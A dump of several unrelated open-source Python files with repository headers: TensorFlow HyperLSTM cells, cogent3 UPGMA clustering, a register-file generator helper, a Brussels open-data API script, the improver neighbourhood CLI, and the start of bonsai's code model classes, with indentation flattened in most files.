import tensorflow.compat.v1 as tf
from tensorflow.contrib import rnn as contrib_rnn
def orthogonal(shape):
"""Orthogonal initilaizer."""
flat_shape = (shape[0], np.prod(shape[1:]))
a = np.random.normal(0.0, 1.0, flat_shape)
u, _, v = np.linalg.svd(a, full_matrices=False)
q = u if u.shape == flat_shape else v
return q.reshape(shape)
def orthogonal_initializer(scale=1.0):
"""Orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
return tf.constant(orthogonal(shape) * scale, dtype)
return _initializer
def lstm_ortho_initializer(scale=1.0):
"""LSTM orthogonal initializer."""
def _initializer(shape, dtype=tf.float32,
partition_info=None): # pylint: disable=unused-argument
size_x = shape[0]
size_h = shape[1] // 4 # assumes lstm.
t = np.zeros(shape)
t[:, :size_h] = orthogonal([size_x, size_h]) * scale
t[:, size_h:size_h * 2] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 2:size_h * 3] = orthogonal([size_x, size_h]) * scale
t[:, size_h * 3:] = orthogonal([size_x, size_h]) * scale
return tf.constant(t, dtype)
return _initializer
class LSTMCell(contrib_rnn.RNNCell):
"""Vanilla LSTM cell.
Uses ortho initializer, and also recurrent dropout without memory loss
(https://arxiv.org/abs/1603.05118)
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.9):
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def state_size(self):
return 2 * self.num_units
@property
def output_size(self):
return self.num_units
def get_output(self, state):
unused_c, h = tf.split(state, 2, 1)
return h
def __call__(self, x, state, scope=None):
with tf.variable_scope(scope or type(self).__name__):
c, h = tf.split(state, 2, 1)
x_size = x.get_shape().as_list()[1]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
# Keep W_xh and W_hh separate here as well to use different init methods.
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
concat = tf.concat([x, h], 1)
w_full = tf.concat([w_xh, w_hh], 0)
hidden = tf.matmul(concat, w_full) + bias
i, j, f, o = tf.split(hidden, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(new_c) * tf.sigmoid(o)
      return new_h, tf.concat([new_c, new_h], 1)  # output, plus fused (c, h) state.
def layer_norm_all(h,
batch_size,
base,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Layer Norm (faster version, but not using defun)."""
  # Performs layer norm on multiple bases at once (i.e., i, g, j, o for lstm).
  # Reshapes h in order to perform layer norm in parallel.
h_reshape = tf.reshape(h, [batch_size, base, num_units])
mean = tf.reduce_mean(h_reshape, [2], keep_dims=True)
var = tf.reduce_mean(tf.square(h_reshape - mean), [2], keep_dims=True)
epsilon = tf.constant(epsilon)
rstd = tf.rsqrt(var + epsilon)
h_reshape = (h_reshape - mean) * rstd
# reshape back to original
h = tf.reshape(h_reshape, [batch_size, base * num_units])
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [4 * num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [4 * num_units], initializer=tf.constant_initializer(0.0))
if use_bias:
return gamma * h + beta
return gamma * h
def layer_norm(x,
num_units,
scope='layer_norm',
reuse=False,
gamma_start=1.0,
epsilon=1e-3,
use_bias=True):
"""Calculate layer norm."""
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
x_shifted = x - mean
var = tf.reduce_mean(tf.square(x_shifted), axes, keep_dims=True)
inv_std = tf.rsqrt(var + epsilon)
with tf.variable_scope(scope):
if reuse:
tf.get_variable_scope().reuse_variables()
gamma = tf.get_variable(
'ln_gamma', [num_units],
initializer=tf.constant_initializer(gamma_start))
if use_bias:
beta = tf.get_variable(
'ln_beta', [num_units], initializer=tf.constant_initializer(0.0))
output = gamma * (x_shifted) * inv_std
if use_bias:
output += beta
return output
def raw_layer_norm(x, epsilon=1e-3):
axes = [1]
mean = tf.reduce_mean(x, axes, keep_dims=True)
std = tf.sqrt(
tf.reduce_mean(tf.square(x - mean), axes, keep_dims=True) + epsilon)
output = (x - mean) / (std)
return output
def super_linear(x,
output_size,
scope=None,
reuse=False,
init_w='ortho',
weight_start=0.0,
use_bias=True,
bias_start=0.0,
input_size=None):
"""Performs linear operation. Uses ortho init defined earlier."""
shape = x.get_shape().as_list()
with tf.variable_scope(scope or 'linear'):
if reuse:
tf.get_variable_scope().reuse_variables()
w_init = None # uniform
if input_size is None:
x_size = shape[1]
else:
x_size = input_size
if init_w == 'zeros':
w_init = tf.constant_initializer(0.0)
elif init_w == 'constant':
w_init = tf.constant_initializer(weight_start)
elif init_w == 'gaussian':
w_init = tf.random_normal_initializer(stddev=weight_start)
elif init_w == 'ortho':
w_init = lstm_ortho_initializer(1.0)
w = tf.get_variable(
'super_linear_w', [x_size, output_size], tf.float32, initializer=w_init)
if use_bias:
b = tf.get_variable(
'super_linear_b', [output_size],
tf.float32,
initializer=tf.constant_initializer(bias_start))
return tf.matmul(x, w) + b
return tf.matmul(x, w)
class LayerNormLSTMCell(contrib_rnn.RNNCell):
"""Layer-Norm, with Ortho Init. and Recurrent Dropout without Memory Loss.
https://arxiv.org/abs/1607.06450 - Layer Norm
https://arxiv.org/abs/1603.05118 - Recurrent Dropout without Memory Loss
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90):
"""Initialize the Layer Norm LSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
@property
def input_size(self):
return self.num_units
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.num_units
def get_output(self, state):
h, unused_c = tf.split(state, 2, 1)
return h
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
h, c = tf.split(state, 2, 1)
h_size = self.num_units
x_size = x.get_shape().as_list()[1]
batch_size = x.get_shape().as_list()[0]
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
concat = tf.concat([x, h], 1) # concat for speed.
w_full = tf.concat([w_xh, w_hh], 0)
      concat = tf.matmul(concat, w_full)  # no bias here; beta in layer_norm_all below acts as the bias.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
concat = layer_norm_all(concat, batch_size, 4, h_size, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, h_size, 'ln_c')) * tf.sigmoid(o)
return new_h, tf.concat([new_h, new_c], 1)
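# Illustrative sketch (not from the original file): statically unrolling one of
# the cells above. The helper name, scope name and shapes are assumptions; the
# cells expect statically-shaped [batch, depth] inputs and a [batch, state_size]
# state tensor.
def _example_static_unroll(inputs, num_units=128):
  """inputs: a list of [batch, depth] tensors, one per time step."""
  cell = LayerNormLSTMCell(num_units, use_recurrent_dropout=True)
  batch_size = inputs[0].get_shape().as_list()[0]
  state = tf.zeros([batch_size, cell.state_size])
  outputs = []
  with tf.variable_scope('example_unroll'):
    for t, x_t in enumerate(inputs):
      if t > 0:
        tf.get_variable_scope().reuse_variables()
      output, state = cell(x_t, state)
      outputs.append(output)
  return outputs, state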
class HyperLSTMCell(contrib_rnn.RNNCell):
"""HyperLSTM with Ortho Init, Layer Norm, Recurrent Dropout, no Memory Loss.
https://arxiv.org/abs/1609.09106
http://blog.otoro.net/2016/09/28/hyper-networks/
"""
def __init__(self,
num_units,
forget_bias=1.0,
use_recurrent_dropout=False,
dropout_keep_prob=0.90,
use_layer_norm=True,
hyper_num_units=256,
hyper_embedding_size=32,
hyper_use_recurrent_dropout=False):
"""Initialize the Layer Norm HyperLSTM cell.
Args:
num_units: int, The number of units in the LSTM cell.
forget_bias: float, The bias added to forget gates (default 1.0).
use_recurrent_dropout: Whether to use Recurrent Dropout (default False)
dropout_keep_prob: float, dropout keep probability (default 0.90)
use_layer_norm: boolean. (default True)
Controls whether we use LayerNorm layers in main LSTM & HyperLSTM cell.
hyper_num_units: int, number of units in HyperLSTM cell.
(default is 128, recommend experimenting with 256 for larger tasks)
hyper_embedding_size: int, size of signals emitted from HyperLSTM cell.
(default is 16, recommend trying larger values for large datasets)
hyper_use_recurrent_dropout: boolean. (default False)
Controls whether HyperLSTM cell also uses recurrent dropout.
Recommend turning this on only if hyper_num_units becomes large (>= 512)
"""
self.num_units = num_units
self.forget_bias = forget_bias
self.use_recurrent_dropout = use_recurrent_dropout
self.dropout_keep_prob = dropout_keep_prob
self.use_layer_norm = use_layer_norm
self.hyper_num_units = hyper_num_units
self.hyper_embedding_size = hyper_embedding_size
self.hyper_use_recurrent_dropout = hyper_use_recurrent_dropout
self.total_num_units = self.num_units + self.hyper_num_units
if self.use_layer_norm:
cell_fn = LayerNormLSTMCell
else:
cell_fn = LSTMCell
self.hyper_cell = cell_fn(
hyper_num_units,
use_recurrent_dropout=hyper_use_recurrent_dropout,
dropout_keep_prob=dropout_keep_prob)
@property
def input_size(self):
return self._input_size
@property
def output_size(self):
return self.num_units
@property
def state_size(self):
return 2 * self.total_num_units
def get_output(self, state):
total_h, unused_total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
return h
def hyper_norm(self, layer, scope='hyper', use_bias=True):
num_units = self.num_units
embedding_size = self.hyper_embedding_size
# recurrent batch norm init trick (https://arxiv.org/abs/1603.09025).
    init_gamma = 0.10  # value following Cooijmans et al. (recurrent batch norm).
with tf.variable_scope(scope):
zw = super_linear(
self.hyper_output,
embedding_size,
init_w='constant',
weight_start=0.00,
use_bias=True,
bias_start=1.0,
scope='zw')
alpha = super_linear(
zw,
num_units,
init_w='constant',
weight_start=init_gamma / embedding_size,
use_bias=False,
scope='alpha')
result = tf.multiply(alpha, layer)
if use_bias:
zb = super_linear(
self.hyper_output,
embedding_size,
init_w='gaussian',
weight_start=0.01,
use_bias=False,
bias_start=0.0,
scope='zb')
beta = super_linear(
zb,
num_units,
init_w='constant',
weight_start=0.00,
use_bias=False,
scope='beta')
result += beta
return result
def __call__(self, x, state, timestep=0, scope=None):
with tf.variable_scope(scope or type(self).__name__):
total_h, total_c = tf.split(state, 2, 1)
h = total_h[:, 0:self.num_units]
c = total_c[:, 0:self.num_units]
self.hyper_state = tf.concat(
[total_h[:, self.num_units:], total_c[:, self.num_units:]], 1)
batch_size = x.get_shape().as_list()[0]
x_size = x.get_shape().as_list()[1]
self._input_size = x_size
w_init = None # uniform
h_init = lstm_ortho_initializer(1.0)
w_xh = tf.get_variable(
'W_xh', [x_size, 4 * self.num_units], initializer=w_init)
w_hh = tf.get_variable(
'W_hh', [self.num_units, 4 * self.num_units], initializer=h_init)
bias = tf.get_variable(
'bias', [4 * self.num_units],
initializer=tf.constant_initializer(0.0))
# concatenate the input and hidden states for hyperlstm input
hyper_input = tf.concat([x, h], 1)
hyper_output, hyper_new_state = self.hyper_cell(hyper_input,
self.hyper_state)
self.hyper_output = hyper_output
self.hyper_state = hyper_new_state
xh = tf.matmul(x, w_xh)
hh = tf.matmul(h, w_hh)
# split Wxh contributions
ix, jx, fx, ox = tf.split(xh, 4, 1)
ix = self.hyper_norm(ix, 'hyper_ix', use_bias=False)
jx = self.hyper_norm(jx, 'hyper_jx', use_bias=False)
fx = self.hyper_norm(fx, 'hyper_fx', use_bias=False)
ox = self.hyper_norm(ox, 'hyper_ox', use_bias=False)
# split Whh contributions
ih, jh, fh, oh = tf.split(hh, 4, 1)
ih = self.hyper_norm(ih, 'hyper_ih', use_bias=True)
jh = self.hyper_norm(jh, 'hyper_jh', use_bias=True)
fh = self.hyper_norm(fh, 'hyper_fh', use_bias=True)
oh = self.hyper_norm(oh, 'hyper_oh', use_bias=True)
# split bias
ib, jb, fb, ob = tf.split(bias, 4, 0) # bias is to be broadcasted.
# i = input_gate, j = new_input, f = forget_gate, o = output_gate
i = ix + ih + ib
j = jx + jh + jb
f = fx + fh + fb
o = ox + oh + ob
if self.use_layer_norm:
concat = tf.concat([i, j, f, o], 1)
concat = layer_norm_all(concat, batch_size, 4, self.num_units, 'ln_all')
i, j, f, o = tf.split(concat, 4, 1)
if self.use_recurrent_dropout:
g = tf.nn.dropout(tf.tanh(j), self.dropout_keep_prob)
else:
g = tf.tanh(j)
new_c = c * tf.sigmoid(f + self.forget_bias) + tf.sigmoid(i) * g
new_h = tf.tanh(layer_norm(new_c, self.num_units, 'ln_c')) * tf.sigmoid(o)
hyper_h, hyper_c = tf.split(hyper_new_state, 2, 1)
new_total_h = tf.concat([new_h, hyper_h], 1)
new_total_c = tf.concat([new_c, hyper_c], 1)
new_total_state = tf.concat([new_total_h, new_total_c], 1)
return new_h, new_total_state
| 2.21875 | 2 |
src/cogent3/cluster/UPGMA.py | u6052029/cogent3 | 0 | 5585 | # usr/bin/env python
"""Functions to cluster using UPGMA
upgma takes a dictionary of pair tuples mapped to distances as input.
UPGMA_cluster takes an array and a list of PhyloNode objects corresponding
to the array as input. Can also generate this type of input from a DictArray using
inputs_from_dict_array function.
Both return a PhyloNode object of the UPGMA cluster
"""
import numpy
from numpy import argmin, array, average, diag, ma, ravel, sum, take
from cogent3.core.tree import PhyloNode
from cogent3.util.dict_array import DictArray
__author__ = "<NAME>"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["<NAME>", "<NAME>", "<NAME>"]
__license__ = "BSD-3"
__version__ = "2020.7.2a"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
numerictypes = numpy.core.numerictypes.sctype2char
Float = numerictypes(float)
BIG_NUM = 1e305
def upgma(pairwise_distances):
"""Uses the UPGMA algorithm to cluster sequences
pairwise_distances: a dictionary with pair tuples mapped to a distance
returns a PhyloNode object of the UPGMA cluster
"""
darr = DictArray(pairwise_distances)
matrix_a, node_order = inputs_from_dict_array(darr)
tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM)
index = 0
for node in tree.traverse():
if not node.parent:
node.name = "root"
elif not node.name:
node.name = "edge." + str(index)
index += 1
return tree
def find_smallest_index(matrix):
"""returns the index of the smallest element in a numpy array
for UPGMA clustering elements on the diagonal should first be
substituted with a very large number so that they are always
    larger than the rest of the values in the array."""
# get the shape of the array as a tuple (e.g. (3,3))
shape = matrix.shape
# turn into a 1 by x array and get the index of the lowest number
matrix1D = ravel(matrix)
lowest_index = argmin(matrix1D)
# convert the lowest_index derived from matrix1D to one for the original
# square matrix and return
row_len = shape[0]
return divmod(lowest_index, row_len)
def condense_matrix(matrix, smallest_index, large_value):
"""converges the rows and columns indicated by smallest_index
Smallest index is returned from find_smallest_index.
For both the rows and columns, the values for the two indices are
averaged. The resulting vector replaces the first index in the array
and the second index is replaced by an array with large numbers so that
it is never chosen again with find_smallest_index.
"""
first_index, second_index = smallest_index
# get the rows and make a new vector that has their average
rows = take(matrix, smallest_index, 0)
new_vector = average(rows, 0)
# replace info in the row and column for first index with new_vector
matrix[first_index] = new_vector
matrix[:, first_index] = new_vector
# replace the info in the row and column for the second index with
# high numbers so that it is ignored
matrix[second_index] = large_value
matrix[:, second_index] = large_value
return matrix
def condense_node_order(matrix, smallest_index, node_order):
"""condenses two nodes in node_order based on smallest_index info
This function is used to create a tree while condensing a matrix
with the condense_matrix function. The smallest_index is retrieved
with find_smallest_index. The first index is replaced with a node object
that combines the two nodes corresponding to the indices in node order.
The second index in smallest_index is replaced with None.
Also sets the branch length of the nodes to 1/2 of the distance between
the nodes in the matrix"""
index1, index2 = smallest_index
node1 = node_order[index1]
node2 = node_order[index2]
# get the distance between the nodes and assign 1/2 the distance to the
    # length property of each node
distance = matrix[index1, index2]
nodes = [node1, node2]
d = distance / 2.0
for n in nodes:
if n.children:
n.length = d - n.children[0].TipLength
else:
n.length = d
n.TipLength = d
# combine the two nodes into a new PhyloNode object
new_node = PhyloNode()
new_node.children.append(node1)
new_node.children.append(node2)
node1.parent = new_node
node2.parent = new_node
# replace the object at index1 with the combined node
node_order[index1] = new_node
# replace the object at index2 with None
node_order[index2] = None
return node_order
def UPGMA_cluster(matrix, node_order, large_number):
"""cluster with UPGMA
matrix is a numpy array.
node_order is a list of PhyloNode objects corresponding to the matrix.
large_number will be assigned to the matrix during the process and
should be much larger than any value already in the matrix.
WARNING: Changes matrix in-place.
WARNING: Expects matrix to already have diagonals assigned to large_number
before this function is called.
"""
num_entries = len(node_order)
tree = None
for i in range(num_entries - 1):
smallest_index = find_smallest_index(matrix)
index1, index2 = smallest_index
# if smallest_index is on the diagonal set the diagonal to large_number
if index1 == index2:
matrix[diag([True] * len(matrix))] = large_number
smallest_index = find_smallest_index(matrix)
row_order = condense_node_order(matrix, smallest_index, node_order)
matrix = condense_matrix(matrix, smallest_index, large_number)
tree = node_order[smallest_index[0]]
return tree
def inputs_from_dict_array(darr):
"""makes inputs for UPGMA_cluster from a DictArray object
"""
darr.array += numpy.eye(darr.shape[0]) * BIG_NUM
nodes = list(map(PhyloNode, darr.keys()))
return darr.array, nodes
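# Illustrative example (not part of the original module). Per the module
# docstring, distances are supplied as a dict keyed by pair tuples; the values
# below are invented and listed in both orderings for symmetry.
if __name__ == "__main__":
    example_dists = {
        ("a", "b"): 0.5, ("b", "a"): 0.5,
        ("a", "c"): 0.8, ("c", "a"): 0.8,
        ("b", "c"): 0.7, ("c", "b"): 0.7,
    }
    example_tree = upgma(example_dists)
    print(example_tree)  # newick-style rendering of the UPGMA cluster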
| 3.140625 | 3 |
src/python/make_store_entry.py | kf7lsu/RegfileCompiler-public | 0 | 5586 | #this code will generate the structural verilog for a single entry in the register file
#takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the
#tristate buffers on the read outputs
#expects the same things as make_store_cell, ensure code is valid there
#<NAME>
#EE 526
#4/20/21
from make_store_cell import make_store_cell
def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num):
#just need to create the correct number of bits
#this and the make_store_array are going to be pretty simple
for bit in range(bits):
make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num)
return
if __name__ == '__main__':
f = open('store_entry_test.txt', 'w')
rows = 4
cols = 2
reads = 2
for row in range(rows):
make_store_entry(f, row, cols, reads, 1, 0)
f.close()
| 2.953125 | 3 |
module1/api.py | oceandelee/tac | 0 | 5587 | """API for AVB"""
import json
import sys
import requests
def actualite_found():
osm = "https://opendata.bruxelles.be/api/datasets/1.0/search/?q="
data = {
"nhits":0,
"parameters":{
"dataset":"actualites-ville-de-bruxelles",
"timezone":"UTC",
"q":"actualite",
"language": "fr",
"rows":10,
"start":0,
"sort":[
"published"
]
,
"format":"json"
}
,
"records":[]
}
resp = requests.get(osm, data)
if resp.status_code == 200:
print(resp.json()["datasets"][0]["metas"])
else:
print("actualite not found")
return resp
def get_result(resp,n,attribut):
metas = resp.json()["datasets"][n]["metas"]
return metas[attribut]
def nb_result(resp):
return len(resp.json()["datasets"])
#Example of use
if __name__ == "__main__":
resp = actualite_found()
result = get_result(resp,2,"description")
print(result)
print(nb_result(resp)) | 3.09375 | 3 |
improver/cli/nbhood.py | cpelley/improver | 77 | 5588 | <reponame>cpelley/improver
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Script to run neighbourhood processing."""
from improver import cli
from improver.constants import DEFAULT_PERCENTILES
@cli.clizefy
@cli.with_output
def process(
cube: cli.inputcube,
mask: cli.inputcube = None,
*,
neighbourhood_output,
neighbourhood_shape,
radii: cli.comma_separated_list,
lead_times: cli.comma_separated_list = None,
degrees_as_complex=False,
weighted_mode=False,
area_sum=False,
remask=False,
percentiles: cli.comma_separated_list = DEFAULT_PERCENTILES,
halo_radius: float = None,
):
"""Runs neighbourhood processing.
Apply the requested neighbourhood method via the
NeighbourhoodProcessing plugin to a Cube.
Args:
cube (iris.cube.Cube):
The Cube to be processed.
mask (iris.cube.Cube):
A cube to mask the input cube. The data should contain 1 for
usable points and 0 for discarded points.
Only supported with square neighbourhoods. (Optional)
neighbourhood_output (str):
The form of the results generated using neighbourhood processing.
If "probabilities" is selected, the mean probability with a
neighbourhood is calculated. If "percentiles" is selected, then
the percentiles are calculated with a neighbourhood. Calculating
percentiles from a neighbourhood is only supported for a circular
neighbourhood.
Options: "probabilities", "percentiles".
neighbourhood_shape (str):
Name of the neighbourhood method to use. Only a "circular"
neighbourhood shape is applicable for calculating "percentiles"
output.
Options: "circular", "square".
radii (list of float):
The radius or a list of radii in metres of the neighbourhood to
apply.
If it is a list, it must be the same length as lead_times, which
defines at which lead time to use which nbhood radius. The radius
will be interpolated for intermediate lead times.
lead_times (list of int):
The lead times in hours that correspond to the radii to be used.
If lead_times are set, radii must be a list the same length as
lead_times.
degrees_as_complex (bool):
Include this option to process angles as complex numbers.
Not compatible with circular kernel or percentiles.
weighted_mode (bool):
Include this option to set the weighting to decrease with radius.
Otherwise a constant weighting is assumed.
weighted_mode is only applicable for calculating "probability"
neighbourhood output using the circular kernel.
area_sum (bool):
Return sum rather than fraction over the neighbourhood area.
remask (bool):
Include this option to apply the original un-neighbourhood
processed mask to the neighbourhood processed cube.
Otherwise the original un-neighbourhood processed mask
is not applied. Therefore, the neighbourhood processing may result
            in values being present in areas that were originally masked.
percentiles (float):
Calculates value at the specified percentiles from the
neighbourhood surrounding each grid point. This argument has no
effect if the output is probabilities.
halo_radius (float):
Set this radius in metres to define the excess halo to clip. Used
where a larger grid was defined than the standard grid and we want
to clip the grid back to the standard grid. Otherwise no clipping
is applied.
Returns:
iris.cube.Cube:
A processed Cube.
Raises:
RuntimeError:
If weighted_mode is used with the wrong neighbourhood_output.
RuntimeError:
If degree_as_complex is used with
neighbourhood_output='percentiles'.
RuntimeError:
If degree_as_complex is used with neighbourhood_shape='circular'.
"""
from improver.nbhood import radius_by_lead_time
from improver.nbhood.nbhood import (
GeneratePercentilesFromANeighbourhood,
NeighbourhoodProcessing,
)
from improver.utilities.pad_spatial import remove_cube_halo
from improver.wind_calculations.wind_direction import WindDirection
sum_or_fraction = "sum" if area_sum else "fraction"
if neighbourhood_output == "percentiles":
if weighted_mode:
raise RuntimeError(
"weighted_mode cannot be used with" 'neighbourhood_output="percentiles"'
)
if degrees_as_complex:
raise RuntimeError("Cannot generate percentiles from complex " "numbers")
if neighbourhood_shape == "circular":
if degrees_as_complex:
raise RuntimeError(
"Cannot process complex numbers with circular neighbourhoods"
)
if degrees_as_complex:
# convert cube data into complex numbers
cube.data = WindDirection.deg_to_complex(cube.data)
radius_or_radii, lead_times = radius_by_lead_time(radii, lead_times)
if neighbourhood_output == "probabilities":
result = NeighbourhoodProcessing(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
weighted_mode=weighted_mode,
sum_or_fraction=sum_or_fraction,
re_mask=remask,
)(cube, mask_cube=mask)
elif neighbourhood_output == "percentiles":
result = GeneratePercentilesFromANeighbourhood(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
percentiles=percentiles,
)(cube)
if degrees_as_complex:
# convert neighbourhooded cube back to degrees
result.data = WindDirection.complex_to_deg(result.data)
if halo_radius is not None:
result = remove_cube_halo(result, halo_radius)
return result
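# Illustrative invocation sketch (not part of the original file). Assuming the
# usual improver CLI wiring, where clize exposes the parameters above as
# hyphenated flags, a probabilistic square-neighbourhood run might look like:
#
#   improver nbhood input.nc --output=output.nc \
#       --neighbourhood-output=probabilities --neighbourhood-shape=square \
#       --radii=20000
#
# The file names and radius value here are placeholders, not values taken from
# this repository.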
| 1.382813 | 1 |
bonsai/model.py | ipa-mirb/bonsai | 0 | 5589 | <gh_stars>0
#Copyright (c) 2017 <NAME>
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
###############################################################################
# Language Model
###############################################################################
class CodeEntity(object):
"""Base class for all programming entities.
All code objects have a file name, a line number, a column number,
a programming scope (e.g. the function or code block they belong to)
and a parent object that should have some variable or collection
holding this object.
"""
def __init__(self, scope, parent):
"""Base constructor for code objects.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
self.scope = scope
self.parent = parent
self.file = None
self.line = None
self.column = None
def walk_preorder(self):
"""Iterates the program tree starting from this object, going down."""
yield self
for child in self._children():
for descendant in child.walk_preorder():
yield descendant
def filter(self, cls, recursive=False):
"""Retrieves all descendants (including self) that are instances
of a given class.
Args:
cls (class): The class to use as a filter.
Kwargs:
recursive (bool): Whether to descend recursively down the tree.
"""
source = self.walk_preorder if recursive else self._children
return [
codeobj
for codeobj in source()
if isinstance(codeobj, cls)
]
def _afterpass(self):
"""Finalizes the construction of a code entity."""
pass
def _validity_check(self):
"""Check whether this object is a valid construct."""
return True
def _children(self):
"""Yield all direct children of this object."""
# The default implementation has no children, and thus should return
# an empty iterator.
return iter(())
def _lookup_parent(self, cls):
"""Lookup a transitive parent object that is an instance
of a given class."""
codeobj = self.parent
while codeobj is not None and not isinstance(codeobj, cls):
codeobj = codeobj.parent
return codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return (' ' * indent) + self.__str__()
def ast_str(self, indent=0):
"""Return a minimal string to print a tree-like structure.
Kwargs:
indent (int): The number of indentation levels.
"""
line = self.line or 0
col = self.column or 0
name = type(self).__name__
spell = getattr(self, 'name', '[no spelling]')
result = ' ({})'.format(self.result) if hasattr(self, 'result') else ''
prefix = indent * '| '
return '{}[{}:{}] {}{}: {}'.format(prefix, line, col,
name, result, spell)
def __str__(self):
"""Return a string representation of this object."""
return self.__repr__()
def __repr__(self):
"""Return a string representation of this object."""
return '[unknown]'
class CodeStatementGroup(object):
"""This class is meant to provide common utility methods for
objects that group multiple program statements together
(e.g. functions, code blocks).
It is not meant to be instantiated directly, only used for
inheritance purposes.
It defines the length of a statement group, and provides methods
for integer-based indexing of program statements (as if using a list).
"""
def statement(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.body.statement(i)
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
try:
return self.statement(i + 1)
except IndexError as e:
return None
def __getitem__(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.statement(i)
def __len__(self):
"""Return the length of the statement group."""
return len(self.body)
# ----- Common Entities -------------------------------------------------------
class CodeVariable(CodeEntity):
